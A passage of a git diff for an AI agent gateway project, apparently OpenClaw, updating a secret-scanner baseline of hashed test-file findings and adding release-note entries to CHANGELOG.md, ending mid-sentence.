"e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4", "is_verified": false, - "line_number": 106 + "line_number": 107 + }, + { + "type": "Secret Keyword", + "filename": "src/line/bot-handlers.test.ts", + "hashed_secret": "d76baddf1b9e3d8e31216f22c73d65d2e91ada7b", + "is_verified": false, + "line_number": 358 } ], "src/line/bot-message-context.test.ts": [ @@ -12799,6 +14131,13 @@ "hashed_secret": "e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4", "is_verified": false, "line_number": 18 + }, + { + "type": "Hex High Entropy String", + "filename": "src/line/bot-message-context.test.ts", + "hashed_secret": "d369d8c413645b43df8ac26be7295cd15a64f9bf", + "is_verified": false, + "line_number": 179 } ], "src/line/monitor.fail-closed.test.ts": [ @@ -12810,6 +14149,15 @@ "line_number": 22 } ], + "src/line/monitor.lifecycle.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/line/monitor.lifecycle.test.ts", + "hashed_secret": "e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4", + "is_verified": false, + "line_number": 91 + } + ], "src/line/webhook-node.test.ts": [ { "type": "Secret Keyword", @@ -12825,7 +14173,7 @@ "filename": "src/line/webhook.test.ts", "hashed_secret": "e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4", "is_verified": false, - "line_number": 23 + "line_number": 21 } ], "src/logging/redact.test.ts": [ @@ -12858,13 +14206,22 @@ "line_number": 88 } ], - "src/media-understanding/apply.e2e.test.ts": [ + "src/media-understanding/apply.echo-transcript.test.ts": [ { "type": "Secret Keyword", - "filename": "src/media-understanding/apply.e2e.test.ts", + "filename": "src/media-understanding/apply.echo-transcript.test.ts", "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", "is_verified": false, - "line_number": 12 + "line_number": 15 + } + ], + "src/media-understanding/apply.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/media-understanding/apply.test.ts", + "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", + "is_verified": false, + "line_number": 17 } ], "src/media-understanding/providers/deepgram/audio.test.ts": [ @@ -12873,7 +14230,7 @@ "filename": "src/media-understanding/providers/deepgram/audio.test.ts", "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", "is_verified": false, - "line_number": 27 + "line_number": 20 } ], "src/media-understanding/providers/google/video.test.ts": [ @@ -12882,7 +14239,23 @@ "filename": "src/media-understanding/providers/google/video.test.ts", "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", "is_verified": false, - "line_number": 64 + "line_number": 56 + } + ], + "src/media-understanding/providers/mistral/index.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/media-understanding/providers/mistral/index.test.ts", + "hashed_secret": "5b29ef735a0cc9246f2024fe148fa051ddcd9c7b", + "is_verified": false, + "line_number": 23 + }, + { + "type": "Secret Keyword", + "filename": "src/media-understanding/providers/mistral/index.test.ts", + "hashed_secret": "a62f2225bf70bfaccbc7f1ef2a397836717377de", + "is_verified": false, + "line_number": 38 } ], "src/media-understanding/providers/openai/audio.test.ts": [ @@ -12891,7 +14264,7 @@ "filename": "src/media-understanding/providers/openai/audio.test.ts", "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", "is_verified": false, - "line_number": 22 + "line_number": 18 } ], "src/media-understanding/runner.auto-audio.test.ts": [ @@ -12900,7 +14273,7 @@ "filename": "src/media-understanding/runner.auto-audio.test.ts", "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", "is_verified": false, - "line_number": 40 + "line_number": 23 } ], "src/media-understanding/runner.deepgram.test.ts": [ @@ -12909,7 +14282,32 @@ "filename": "src/media-understanding/runner.deepgram.test.ts", "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", "is_verified": false, - "line_number": 44 + "line_number": 31 + } + ], + "src/media-understanding/runner.video.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/media-understanding/runner.video.test.ts", + "hashed_secret": "a47110e348a3063541fb1f1f640d635d457181a0", + "is_verified": false, + "line_number": 17 + }, + { + "type": "Secret Keyword", + "filename": "src/media-understanding/runner.video.test.ts", + "hashed_secret": "2568d97e538e07521431c9ea738e5c2df14df7a2", + "is_verified": false, + "line_number": 88 + } + ], + "src/memory/embeddings-ollama.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/memory/embeddings-ollama.test.ts", + "hashed_secret": "24ff85e3f39fdc772fc759b161935393b6df7071", + "is_verified": false, + "line_number": 47 } ], "src/memory/embeddings-voyage.test.ts": [ @@ -12918,14 +14316,14 @@ "filename": "src/memory/embeddings-voyage.test.ts", "hashed_secret": "7c2020578bbe5e2e3f78d7f954eb2ad8ab5b0403", "is_verified": false, - "line_number": 33 + "line_number": 24 }, { "type": "Secret Keyword", "filename": "src/memory/embeddings-voyage.test.ts", "hashed_secret": "8afdb3da9b79c8957ae35978ea8f33fbc3bfdf60", "is_verified": false, - "line_number": 77 + "line_number": 88 } ], "src/memory/embeddings.test.ts": [ @@ -12934,21 +14332,21 @@ "filename": "src/memory/embeddings.test.ts", "hashed_secret": "a47110e348a3063541fb1f1f640d635d457181a0", "is_verified": false, - "line_number": 45 + "line_number": 47 }, { "type": "Secret Keyword", "filename": "src/memory/embeddings.test.ts", "hashed_secret": "c734e47630dda71619c696d88381f06f7511bd78", "is_verified": false, - "line_number": 160 + "line_number": 195 }, { "type": "Secret Keyword", "filename": "src/memory/embeddings.test.ts", "hashed_secret": "56e1d57b8db262b08bc73c60ed08d8c92e59503f", "is_verified": false, - "line_number": 189 + "line_number": 291 } ], "src/pairing/pairing-store.ts": [ @@ -12957,7 +14355,7 @@ "filename": "src/pairing/pairing-store.ts", "hashed_secret": "f8c6f1ff98c5ee78c27d34a3ca68f35ad79847af", "is_verified": false, - "line_number": 13 + "line_number": 14 } ], "src/pairing/setup-code.test.ts": [ @@ -12966,30 +14364,207 @@ "filename": "src/pairing/setup-code.test.ts", "hashed_secret": "4914c103484773b5a8e18448b11919bb349cbff8", "is_verified": false, - "line_number": 22 + "line_number": 30 + }, + { + "type": "Secret Keyword", + "filename": "src/pairing/setup-code.test.ts", + "hashed_secret": "1951c80555441588e8707fa68a6084a91c8a114a", + "is_verified": false, + "line_number": 74 + }, + { + "type": "Secret Keyword", + "filename": "src/pairing/setup-code.test.ts", + "hashed_secret": "f1355ae408e2068355dad8f3a503c2eaedefc0c6", + "is_verified": false, + "line_number": 106 }, { "type": "Secret Keyword", "filename": "src/pairing/setup-code.test.ts", "hashed_secret": "e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4", "is_verified": false, - "line_number": 96 + "line_number": 370 + } + ], + "src/secrets/apply.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/secrets/apply.test.ts", + "hashed_secret": "b933c37f090368dee5ab803d71af8f5551729a9a", + "is_verified": false, + "line_number": 75 + }, + { + "type": "Base64 High Entropy String", + "filename": "src/secrets/apply.test.ts", + "hashed_secret": "b99aa0d13685d4177199dcdb170d90032408b634", + "is_verified": false, + "line_number": 106 + }, + { + "type": "Secret Keyword", + "filename": "src/secrets/apply.test.ts", + "hashed_secret": "bb0a04dd3612988998c812bc3ad580ba0fb9d905", + "is_verified": false, + "line_number": 360 + }, + { + "type": "Secret Keyword", + "filename": "src/secrets/apply.test.ts", + "hashed_secret": "942c7142a36b069509b957db07321a1cb9b2123a", + "is_verified": false, + "line_number": 397 + }, + { + "type": "Secret Keyword", + "filename": "src/secrets/apply.test.ts", + "hashed_secret": "9c0faa509a7c3079f58421307ecbcaceb7cbd545", + "is_verified": false, + "line_number": 450 + }, + { + "type": "Secret Keyword", + "filename": "src/secrets/apply.test.ts", + "hashed_secret": "c9a4d024f4386d3a4b044de8cb52226383591481", + "is_verified": false, + "line_number": 483 + } + ], + "src/secrets/command-config.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/secrets/command-config.test.ts", + "hashed_secret": "e3801068cd8f45226d71fb7ccd94069d0fbba56d", + "is_verified": false, + "line_number": 14 + } + ], + "src/secrets/configure-plan.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/secrets/configure-plan.test.ts", + "hashed_secret": "68c46e84d76d2e7e686e5158bf598909abd4e45b", + "is_verified": false, + "line_number": 15 + }, + { + "type": "Secret Keyword", + "filename": "src/secrets/configure-plan.test.ts", + "hashed_secret": "b340b5722fdf4bae59f23b1b829bad0a50b98c2a", + "is_verified": false, + "line_number": 142 + } + ], + "src/secrets/path-utils.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/secrets/path-utils.test.ts", + "hashed_secret": "c00dbbc9dadfbe1e232e93a729dd4752fade0abf", + "is_verified": false, + "line_number": 54 + }, + { + "type": "Secret Keyword", + "filename": "src/secrets/path-utils.test.ts", + "hashed_secret": "ff3390557335ba88d37755e41514beb03bc499ec", + "is_verified": false, + "line_number": 72 + } + ], + "src/secrets/runtime.coverage.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/secrets/runtime.coverage.test.ts", + "hashed_secret": "e9a292f7f4d25b0d861458719c6115de3ec813c3", + "is_verified": false, + "line_number": 30 } ], "src/security/audit.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/security/audit.test.ts", + "hashed_secret": "cf27add3cb4cb83efe9a48cf7289068fa869c4cd", + "is_verified": false, + "line_number": 1493 + }, + { + "type": "Secret Keyword", + "filename": "src/security/audit.test.ts", + "hashed_secret": "dfba7aade0868074c2861c98e2a9a92f3178a51b", + "is_verified": false, + "line_number": 1969 + }, + { + "type": "Secret Keyword", + "filename": "src/security/audit.test.ts", + "hashed_secret": "071d3673192b4b44a84aa73ac9d00c155821303b", + "is_verified": false, + "line_number": 1970 + }, + { + "type": "Secret Keyword", + "filename": "src/security/audit.test.ts", + "hashed_secret": "7b231a50a498ef151e291795f46f56bee569eae5", + "is_verified": false, + "line_number": 1982 + }, + { + "type": "Secret Keyword", + "filename": "src/security/audit.test.ts", + "hashed_secret": "5a013c49508291c6816ac388f93a2c11973086ed", + "is_verified": false, + "line_number": 2058 + }, { "type": "Secret Keyword", "filename": "src/security/audit.test.ts", "hashed_secret": "21f688ab56f76a99e5c6ed342291422f4e57e47f", "is_verified": false, - "line_number": 2063 + "line_number": 3473 }, { "type": "Secret Keyword", "filename": "src/security/audit.test.ts", "hashed_secret": "3dc927d80543dc0f643940b70d066bd4b4c4b78e", "is_verified": false, - "line_number": 2094 + "line_number": 3486 + } + ], + "src/security/external-content.test.ts": [ + { + "type": "Hex High Entropy String", + "filename": "src/security/external-content.test.ts", + "hashed_secret": "e8e6c2284ab5bee4de2ee53880c8fc2a4728d3e8", + "is_verified": false, + "line_number": 148 + } + ], + "src/signal/identity.test.ts": [ + { + "type": "Hex High Entropy String", + "filename": "src/signal/identity.test.ts", + "hashed_secret": "99c962e8c62296bdc9a17f5caf91ce9bb4c7e0e6", + "is_verified": false, + "line_number": 15 + } + ], + "src/slack/monitor/monitor.test.ts": [ + { + "type": "Hex High Entropy String", + "filename": "src/slack/monitor/monitor.test.ts", + "hashed_secret": "431ef2b335d72ec03c3a5d6393c8ab87012bba48", + "is_verified": false, + "line_number": 68 + }, + { + "type": "Hex High Entropy String", + "filename": "src/slack/monitor/monitor.test.ts", + "hashed_secret": "6c8fd4b55b7a940cf3d484634cb4f2b9e1a8fe7a", + "is_verified": false, + "line_number": 78 } ], "src/telegram/monitor.test.ts": [ @@ -12998,14 +14573,14 @@ "filename": "src/telegram/monitor.test.ts", "hashed_secret": "e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4", "is_verified": false, - "line_number": 205 + "line_number": 432 }, { "type": "Secret Keyword", "filename": "src/telegram/monitor.test.ts", "hashed_secret": "5934c4d4a4fa5d66ddb3d3fc0bba84996c17a5b7", "is_verified": false, - "line_number": 233 + "line_number": 479 } ], "src/telegram/webhook.test.ts": [ @@ -13014,7 +14589,7 @@ "filename": "src/telegram/webhook.test.ts", "hashed_secret": "e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4", "is_verified": false, - "line_number": 42 + "line_number": 24 } ], "src/tts/tts.test.ts": [ @@ -13030,28 +14605,28 @@ "filename": "src/tts/tts.test.ts", "hashed_secret": "b214f706bb602c1cc2adc5c6165e73622305f4bb", "is_verified": false, - "line_number": 98 + "line_number": 96 }, { "type": "Secret Keyword", "filename": "src/tts/tts.test.ts", "hashed_secret": "75ddfb45216fe09680dfe70eda4f559a910c832c", "is_verified": false, - "line_number": 397 + "line_number": 434 }, { "type": "Secret Keyword", "filename": "src/tts/tts.test.ts", "hashed_secret": "e29af93630aa18cc3457cb5b13937b7ab7c99c9b", "is_verified": false, - "line_number": 413 + "line_number": 444 }, { "type": "Secret Keyword", "filename": "src/tts/tts.test.ts", "hashed_secret": "3acfb2c2b433c0ea7ff107e33df91b18e52f960f", "is_verified": false, - "line_number": 447 + "line_number": 530 } ], "src/tui/gateway-chat.test.ts": [ @@ -13060,7 +14635,7 @@ "filename": "src/tui/gateway-chat.test.ts", "hashed_secret": "6255675480f681df08c1704b7b3cd2c49917f0e2", "is_verified": false, - "line_number": 85 + "line_number": 60 } ], "src/web/login.test.ts": [ @@ -13072,13 +14647,54 @@ "line_number": 60 } ], + "src/wizard/onboarding.gateway-config.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/wizard/onboarding.gateway-config.test.ts", + "hashed_secret": "358fffeb5cef5e34ae867e1d9edf2ba420ca2bf6", + "is_verified": false, + "line_number": 148 + }, + { + "type": "Secret Keyword", + "filename": "src/wizard/onboarding.gateway-config.test.ts", + "hashed_secret": "69449f994d55805535b9e8fab16f6c39934e9ba4", + "is_verified": false, + "line_number": 162 + } + ], + "src/wizard/onboarding.secret-input.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/wizard/onboarding.secret-input.test.ts", + "hashed_secret": "358fffeb5cef5e34ae867e1d9edf2ba420ca2bf6", + "is_verified": false, + "line_number": 22 + } + ], + "src/wizard/onboarding.test.ts": [ + { + "type": "Secret Keyword", + "filename": "src/wizard/onboarding.test.ts", + "hashed_secret": "9c8c592cc7a339f158262ebc87ee5a0cce39ce83", + "is_verified": false, + "line_number": 403 + }, + { + "type": "Secret Keyword", + "filename": "src/wizard/onboarding.test.ts", + "hashed_secret": "69449f994d55805535b9e8fab16f6c39934e9ba4", + "is_verified": false, + "line_number": 487 + } + ], "ui/src/i18n/locales/en.ts": [ { "type": "Secret Keyword", "filename": "ui/src/i18n/locales/en.ts", "hashed_secret": "de0ff6b974d6910aca8d6b830e1b761f076d8fe6", "is_verified": false, - "line_number": 60 + "line_number": 61 } ], "ui/src/i18n/locales/pt-BR.ts": [ @@ -13087,7 +14703,16 @@ "filename": "ui/src/i18n/locales/pt-BR.ts", "hashed_secret": "ef7b6f95faca2d7d3a5aa5a6434c89530c6dd243", "is_verified": false, - "line_number": 60 + "line_number": 61 + } + ], + "ui/src/ui/config-form.browser.test.ts": [ + { + "type": "Secret Keyword", + "filename": "ui/src/ui/config-form.browser.test.ts", + "hashed_secret": "c00dbbc9dadfbe1e232e93a729dd4752fade0abf", + "is_verified": false, + "line_number": 368 } ], "vendor/a2ui/README.md": [ @@ -13100,5 +14725,5 @@ } ] }, - "generated_at": "2026-02-17T13:34:38Z" + "generated_at": "2026-03-07T11:12:54Z" } diff --git a/CHANGELOG.md b/CHANGELOG.md index 86f6e09fe89..fa75cd58cae 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -2,31 +2,32 @@ Docs: https://docs.openclaw.ai -## 2026.3.3 +## 2026.3.7 ### Changes -- Web UI/i18n: add Spanish (`es`) locale support in the Control UI, including locale detection, lazy loading, and language picker labels across supported locales. (#35038) Thanks @DaoPromociones. -- Discord/allowBots mention gating: add `allowBots: "mentions"` to only accept bot-authored messages that mention the bot. Thanks @thewilloftheshadow. -- Docs/Web search: remove outdated Brave free-tier wording and replace prescriptive AI ToS guidance with neutral compliance language in Brave setup docs. (#26860) Thanks @HenryLoenwind. -- Tools/Web search: switch Perplexity provider to Search API with structured results plus new language/region/time filters. (#33822) Thanks @kesku. -- Tools/Diffs guidance loading: move diffs usage guidance from unconditional prompt-hook injection to the plugin companion skill path, reducing unrelated-turn prompt noise while keeping diffs tool behavior unchanged. (#32630) thanks @sircrumpet. -- Agents/tool-result truncation: preserve important tail diagnostics by using head+tail truncation for oversized tool results while keeping configurable truncation options. (#20076) thanks @jlwestsr. -- Telegram/topic agent routing: support per-topic `agentId` overrides in forum groups and DM topics so topics can route to dedicated agents with isolated sessions. (#33647; based on #31513) Thanks @kesor and @Sid-Qin. -- ACP/persistent channel bindings: add durable Discord channel and Telegram topic binding storage, routing resolution, and CLI/docs support so ACP thread targets survive restarts and can be managed consistently. (#34873) Thanks @dutifulbob. -- Slack/DM typing feedback: add `channels.slack.typingReaction` so Socket Mode DMs can show reaction-based processing status even when Slack native assistant typing is unavailable. (#19816) Thanks @dalefrieswthat. -- Cron/job snapshot persistence: skip backup during normalization persistence in `ensureLoaded` so `jobs.json.bak` keeps the pre-edit snapshot for recovery, while preserving backup creation on explicit user-driven writes. (#35234) Thanks @0xsline. -- TTS/OpenAI-compatible endpoints: add `messages.tts.openai.baseUrl` config support with config-over-env precedence, endpoint-aware directive validation, and OpenAI TTS request routing to the resolved base URL. (#34321) thanks @RealKai42. -- Plugins/before_prompt_build system-context fields: add `prependSystemContext` and `appendSystemContext` so static plugin guidance can be placed in system prompt space for provider caching and lower repeated prompt token cost. (#35177) thanks @maweibin. -- Gateway: add SecretRef support for gateway.auth.token with auth-mode guardrails. (#35094) Thanks @joshavant. -- Plugins/hook policy: add `plugins.entries..hooks.allowPromptInjection`, validate unknown typed hook names at runtime, and preserve legacy `before_agent_start` model/provider overrides while stripping prompt-mutating fields when prompt injection is disabled. (#36567) thanks @gumadeiras. -- Tools/Diffs guidance: restore a short system-prompt hint for enabled diffs while keeping the detailed instructions in the companion skill, so diffs usage guidance stays out of user-prompt space. (#36904) thanks @gumadeiras. -- Telegram/ACP topic bindings: accept Telegram Mac Unicode dash option prefixes in `/acp spawn`, support Telegram topic thread binding (`--thread here|auto`), route bound-topic follow-ups to ACP sessions, add actionable Telegram approval buttons with prefixed approval-id resolution, and pin successful bind confirmations in-topic. (#36683) Thanks @huntharo. -- Hooks/Compaction lifecycle: emit `session:compact:before` and `session:compact:after` internal events plus plugin compaction callbacks with session/count metadata, so automations can react to compaction runs consistently. (#16788) thanks @vincentkoc. - Agents/context engine plugin interface: add `ContextEngine` plugin slot with full lifecycle hooks (`bootstrap`, `ingest`, `assemble`, `compact`, `afterTurn`, `prepareSubagentSpawn`, `onSubagentEnded`), slot-based registry with config-driven resolution, `LegacyContextEngine` wrapper preserving existing compaction behavior, scoped subagent runtime for plugin runtimes via `AsyncLocalStorage`, and `sessions.get` gateway method. Enables plugins like `lossless-claw` to provide alternative context management strategies without modifying core compaction logic. Zero behavior change when no context engine plugin is configured. (#22201) thanks @jalehman. -- CLI: make read-only SecretRef status flows degrade safely (#37023) thanks @joshavant. -- Docker/Podman extension dependency baking: add `OPENCLAW_EXTENSIONS` so container builds can preinstall selected bundled extension npm dependencies into the image for faster and more reproducible startup in container deployments. (#32223) Thanks @sallyom. +- ACP/persistent channel bindings: add durable Discord channel and Telegram topic binding storage, routing resolution, and CLI/docs support so ACP thread targets survive restarts and can be managed consistently. (#34873) Thanks @dutifulbob. +- Telegram/ACP topic bindings: accept Telegram Mac Unicode dash option prefixes in `/acp spawn`, support Telegram topic thread binding (`--thread here|auto`), route bound-topic follow-ups to ACP sessions, add actionable Telegram approval buttons with prefixed approval-id resolution, and pin successful bind confirmations in-topic. (#36683) Thanks @huntharo. +- Telegram/topic agent routing: support per-topic `agentId` overrides in forum groups and DM topics so topics can route to dedicated agents with isolated sessions. (#33647; based on #31513) Thanks @kesor and @Sid-Qin. +- Web UI/i18n: add Spanish (`es`) locale support in the Control UI, including locale detection, lazy loading, and language picker labels across supported locales. (#35038) Thanks @DaoPromociones. - Onboarding/web search: add provider selection step and full provider list in configure wizard, with SecretRef ref-mode support during onboarding. (#34009) Thanks @kesku and @thewilloftheshadow. +- Tools/Web search: switch Perplexity provider to Search API with structured results plus new language/region/time filters. (#33822) Thanks @kesku. +- Gateway: add SecretRef support for gateway.auth.token with auth-mode guardrails. (#35094) Thanks @joshavant. +- Docker/Podman extension dependency baking: add `OPENCLAW_EXTENSIONS` so container builds can preinstall selected bundled extension npm dependencies into the image for faster and more reproducible startup in container deployments. (#32223) Thanks @sallyom. +- Plugins/before_prompt_build system-context fields: add `prependSystemContext` and `appendSystemContext` so static plugin guidance can be placed in system prompt space for provider caching and lower repeated prompt token cost. (#35177) thanks @maweibin. +- Plugins/hook policy: add `plugins.entries..hooks.allowPromptInjection`, validate unknown typed hook names at runtime, and preserve legacy `before_agent_start` model/provider overrides while stripping prompt-mutating fields when prompt injection is disabled. (#36567) thanks @gumadeiras. +- Hooks/Compaction lifecycle: emit `session:compact:before` and `session:compact:after` internal events plus plugin compaction callbacks with session/count metadata, so automations can react to compaction runs consistently. (#16788) thanks @vincentkoc. +- Agents/compaction post-context configurability: add `agents.defaults.compaction.postCompactionSections` so deployments can choose which `AGENTS.md` sections are re-injected after compaction, while preserving legacy fallback behavior when the documented default pair is configured in any order. (#34556) thanks @efe-arv. +- TTS/OpenAI-compatible endpoints: add `messages.tts.openai.baseUrl` config support with config-over-env precedence, endpoint-aware directive validation, and OpenAI TTS request routing to the resolved base URL. (#34321) thanks @RealKai42. +- Slack/DM typing feedback: add `channels.slack.typingReaction` so Socket Mode DMs can show reaction-based processing status even when Slack native assistant typing is unavailable. (#19816) Thanks @dalefrieswthat. +- Discord/allowBots mention gating: add `allowBots: "mentions"` to only accept bot-authored messages that mention the bot. Thanks @thewilloftheshadow. +- Agents/tool-result truncation: preserve important tail diagnostics by using head+tail truncation for oversized tool results while keeping configurable truncation options. (#20076) thanks @jlwestsr. +- Cron/job snapshot persistence: skip backup during normalization persistence in `ensureLoaded` so `jobs.json.bak` keeps the pre-edit snapshot for recovery, while preserving backup creation on explicit user-driven writes. (#35234) Thanks @0xsline. +- CLI: make read-only SecretRef status flows degrade safely (#37023) thanks @joshavant. +- Tools/Diffs guidance: restore a short system-prompt hint for enabled diffs while keeping the detailed instructions in the companion skill, so diffs usage guidance stays out of user-prompt space. (#36904) thanks @gumadeiras. +- Tools/Diffs guidance loading: move diffs usage guidance from unconditional prompt-hook injection to the plugin companion skill path, reducing unrelated-turn prompt noise while keeping diffs tool behavior unchanged. (#32630) thanks @sircrumpet. +- Docs/Web search: remove outdated Brave free-tier wording and replace prescriptive AI ToS guidance with neutral compliance language in Brave setup docs. (#26860) Thanks @HenryLoenwind. ### Breaking @@ -34,6 +35,7 @@ Docs: https://docs.openclaw.ai ### Fixes +- Gateway/Telegram stale-socket restart guard: only apply stale-socket restarts to channels that publish event-liveness timestamps, preventing Telegram providers from being misclassified as stale solely due to long uptime and avoiding restart/pairing storms after upgrade. (openclaw#38464) - Onboarding/headless Linux daemon probe hardening: treat `systemctl --user is-enabled` probe failures as non-fatal during daemon install flow so onboarding no longer crashes on SSH/headless VPS environments before showing install guidance. (#37297) Thanks @acarbajal-web. - Memory/QMD mcporter Windows spawn hardening: when `mcporter.cmd` launch fails with `spawn EINVAL`, retry via bare `mcporter` shell resolution so QMD recall can continue instead of falling back to builtin memory search. (#27402) Thanks @i0ivi0i. - Tools/web_search Brave language-code validation: align `search_lang` handling with Brave-supported codes (including `zh-hans`, `zh-hant`, `en-gb`, and `pt-br`), map common alias inputs (`zh`, `ja`) to valid Brave values, and reject unsupported codes before upstream requests to prevent 422 failures. (#37260) Thanks @heyanming. @@ -88,6 +90,7 @@ Docs: https://docs.openclaw.ai - Auto-reply/system events: restore runtime system events to the message timeline (`System:` lines), preserve think-hint parsing with prepended events, and carry events into deferred followup/collect/steer-backlog prompts to keep cache behavior stable without dropping queued metadata. (#34794) Thanks @anisoptera. - Security/audit account handling: avoid prototype-chain account IDs in audit validation by using own-property checks for `accounts`. (#34982) Thanks @HOYALIM. - Cron/restart catch-up semantics: replay interrupted recurring jobs and missed immediate cron slots on startup without replaying interrupted one-shot jobs, with guarded missed-slot probing to avoid malformed-schedule startup aborts and duplicate-trigger drift after restart. (from #34466, #34896, #34625, #33206) Thanks @dunamismax, @dsantoreis, @Octane0411, and @Sid-Qin. +- Venice/provider onboarding hardening: align per-model Venice completion-token limits with discovery metadata, clamp untrusted discovery values to safe bounds, sync the static Venice fallback catalog with current live model metadata, and disable tool wiring for Venice models that do not support function calling so default Venice setups no longer fail with `max_completion_tokens` or unsupported-tools 400s. Fixes #38168. Thanks @Sid-Qin, @powermaster888 and @vincentkoc. - Agents/session usage tracking: preserve accumulated usage metadata on embedded Pi runner error exits so failed turns still update session `totalTokens` from real usage instead of stale prior values. (#34275) thanks @RealKai42. - Slack/reaction thread context routing: carry Slack native DM channel IDs through inbound context and threading tool resolution so reaction targets resolve consistently for DM `To=user:*` sessions (including `toolContext.currentChannelId` fallback behavior). (from #34831; overlaps #34440, #34502, #34483, #32754) Thanks @dunamismax. - Subagents/announce completion scoping: scope nested direct-child completion aggregation to the current requester run window, harden frozen completion capture for deterministic descendant synthesis, and route completion announce delivery through parent-agent announce turns with provenance-aware internal events. (#35080) Thanks @tyler6204. @@ -101,6 +104,7 @@ Docs: https://docs.openclaw.ai - Gateway/HTTP tools invoke media compatibility: preserve raw media payload access for direct `/tools/invoke` clients by allowing media `nodes` invoke commands only in HTTP tool context, while keeping agent-context media invoke blocking to prevent base64 prompt bloat. (#34365) Thanks @obviyus. - Agents/Nodes media outputs: add dedicated `photos_latest` action handling, block media-returning `nodes invoke` commands, keep metadata-only `camera.list` invoke allowed, and normalize empty `photos_latest` results to a consistent response shape to prevent base64 context bloat. (#34332) Thanks @obviyus. - TUI/session-key canonicalization: normalize `openclaw tui --session` values to lowercase so uppercase session names no longer drop real-time streaming updates due to gateway/TUI key mismatches. (#33866, #34013) thanks @lynnzc. +- iMessage/echo loop hardening: strip leaked assistant-internal scaffolding from outbound iMessage replies, drop reflected assistant-content messages before they re-enter inbound processing, extend echo-cache text retention for delayed reflections, and suppress repeated loop traffic before it amplifies into queue overflow. (#33295) Thanks @joelnishanth. - Outbound/send config threading: pass resolved SecretRef config through outbound adapters and helper send paths so send flows do not reload unresolved runtime config. (#33987) Thanks @joshavant. - Sessions/subagent attachments: remove `attachments[].content.maxLength` from `sessions_spawn` schema to avoid llama.cpp GBNF repetition overflow, and preflight UTF-8 byte size before buffer allocation while keeping runtime file-size enforcement unchanged. (#33648) Thanks @anisoptera. - Runtime/tool-state stability: recover from dangling Anthropic `tool_use` after compaction, serialize long-running Discord handler runs without blocking new inbound events, and prevent stale busy snapshots from suppressing stuck-channel recovery. (from #33630, #33583) Thanks @kevinWangSheng and @theotarr. @@ -121,6 +125,7 @@ Docs: https://docs.openclaw.ai - Security/auth labels: remove token and API-key snippets from user-facing auth status labels so `/status` and `/models` do not expose credential fragments. (#33262) thanks @cu1ch3n. - Auth/credential semantics: align profile eligibility + probe diagnostics with SecretRef/expiry rules and harden browser download atomic writes. (#33733) thanks @joshavant. - Security/audit denyCommands guidance: suggest likely exact node command IDs for unknown `gateway.nodes.denyCommands` entries so ineffective denylist entries are easier to correct. (#29713) thanks @liquidhorizon88-bot. +- Agents/overload failover handling: classify overloaded provider failures separately from rate limits/status timeouts, add short overload backoff before retry/failover, record overloaded prompt/assistant failures as transient auth-profile cooldowns (with probeable same-provider fallback) instead of treating them like persistent auth/billing failures, and keep one-shot cron retry classification aligned so overloaded fallback summaries still count as transient retries. - Docs/security hardening guidance: document Docker `DOCKER-USER` + UFW policy and add cross-linking from Docker install docs for VPS/public-host setups. (#27613) thanks @dorukardahan. - Docs/security threat-model links: replace relative `.md` links with Mintlify-compatible root-relative routes in security docs to prevent broken internal navigation. (#27698) thanks @clawdoo. - Plugins/Update integrity drift: avoid false integrity drift prompts when updating npm-installed plugins from unpinned specs, while keeping drift checks for exact pinned versions. (#37179) Thanks @vincentkoc. @@ -200,14 +205,33 @@ Docs: https://docs.openclaw.ai - Agents/gateway config guidance: stop exposing `config.schema` through the agent `gateway` tool, remove prompt/docs guidance that told agents to call it, and keep agents on `config.get` plus `config.patch`/`config.apply` for config changes. (#7382) thanks @kakuteki. - Agents/failover: classify periodic provider limit exhaustion text (for example `Weekly/Monthly Limit Exhausted`) as `rate_limit` while keeping explicit `402 Payment Required` variants in billing, so failover continues without misclassifying billing-wrapped quota errors. (#33813) thanks @zhouhe-xydt. - Mattermost/interactive button callbacks: allow external callback base URLs and stop requiring loopback-origin requests so button clicks work when Mattermost reaches the gateway over Tailscale, LAN, or a reverse proxy. (#37543) thanks @mukhtharcm. +- Gateway/chat.send route inheritance: keep explicit external delivery for channel-scoped sessions while preventing shared-main and other channel-agnostic webchat sessions from inheriting stale external routes, so Control UI replies stay on webchat without breaking selected channel-target sessions. (#34669) Thanks @vincentkoc. - Telegram/Discord media upload caps: make outbound uploads honor channel `mediaMaxMb` config, raise Telegram's default media cap to 100MB, and remove MIME fallback limits that kept some Telegram uploads at 16MB. Thanks @vincentkoc. - Skills/nano-banana-pro resolution override: respect explicit `--resolution` values during image editing and only auto-detect output size from input images when the flag is omitted. (#36880) Thanks @shuofengzhang and @vincentkoc. - Skills/openai-image-gen CLI validation: validate `--background` and `--style` inputs early, normalize supported values, and warn when those flags are ignored for incompatible models. (#36762) Thanks @shuofengzhang and @vincentkoc. - Skills/openai-image-gen output formats: validate `--output-format` values early, normalize aliases like `jpg -> jpeg`, and warn when the flag is ignored for incompatible models. (#36648) Thanks @shuofengzhang and @vincentkoc. +- ACP/skill env isolation: strip skill-injected API keys from ACP harness child-process environments so tools like Codex CLI keep their own auth flow instead of inheriting 